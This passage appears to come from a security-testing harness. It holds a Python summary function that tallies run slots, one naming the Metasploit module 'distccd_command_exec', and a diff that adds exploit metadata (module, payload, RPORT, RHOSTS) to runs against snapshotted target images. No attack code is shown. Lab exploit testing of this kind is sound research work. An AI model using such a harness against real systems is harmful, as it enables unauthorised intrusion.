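        {"slot": 1, "sample": "s1", "tier": "tier3",
         "module": "distccd_command_exec", "rc": 1},
        {"slot": 2, "sample": "s2", "tier": "tier2", "module": None, "rc": 0},
    ],
})


def summarize(raw: str) -> dict:
    """Tally tiers and modules, and list slots with a non-zero return code."""
    slots = json.loads(raw)["slots"]
    return {
        "tiers": dict(Counter(s["tier"] for s in slots)),
        "modules": dict(Counter(s["module"] for s in slots if s["module"])),
        "failed_slots": [s["slot"] for s in slots if s["rc"] != 0],
    }


print(summarize(RAW))
```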
--- a/tools/run_tier3_demo.py
+++ b/tools/run_tier3_demo.py
@@ -224,6 +224,16 @@ def main() -> int:
            phase_schedule=DEFAULT_SCHEDULE,
            image_name=module.name + "-target",
            snapshot_name="qcow2-snapshot-on",
+            sample=sample,
+            exploit_meta={
+                "framework": "metasploit",
+                "module": module.module_path,
+                "module_type": module.module_type,
+                "module_name": module.name,
+                "payload": module.payload_path,
+                "rport": module.options.get("RPORT"),
+                "rhost_template": module.options.get("RHOSTS"),
+            },
        )
        runner = EpisodeRunner(cfg)